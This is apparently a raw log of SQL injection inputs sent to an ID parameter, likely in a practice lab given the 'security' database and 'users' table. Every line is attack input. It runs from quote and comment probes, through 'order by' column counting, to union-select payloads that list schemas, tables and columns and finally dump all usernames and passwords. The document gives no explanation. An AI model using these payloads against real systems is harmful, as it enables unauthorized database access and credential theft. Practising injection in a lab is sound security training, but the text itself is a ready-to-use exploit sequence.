ID:1
ID:1
ID:1'
ID:1''
ID:1'
ID:1' #
ID:1' #
ID:1' #
ID:1' #
ID:1" #
ID:1" #
ID:1" #
ID:1" #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1) #
ID:1" #
ID:1' #
ID:1' #
ID:1' #
ID:1 order by 5 #
ID:1 order by 5 #
ID:1 order by 5 #
ID:1 order by 3 #
ID:1 order by 4 #
ID:1'
ID:-1 union select 1,group_concat(schema_name) from information_schema.schemata #
ID:-1 union select 1,group_concat(schema_name) from information_schema.schemata,3 #
ID:-1 union select 1,group_concat(schema_name),3 from information_schema.schemata #
ID:-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = 'security' #
ID:-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' #
ID:-1 union select 1,group_concat(username),group_concat(password) from users #
ID:3
ID:3'
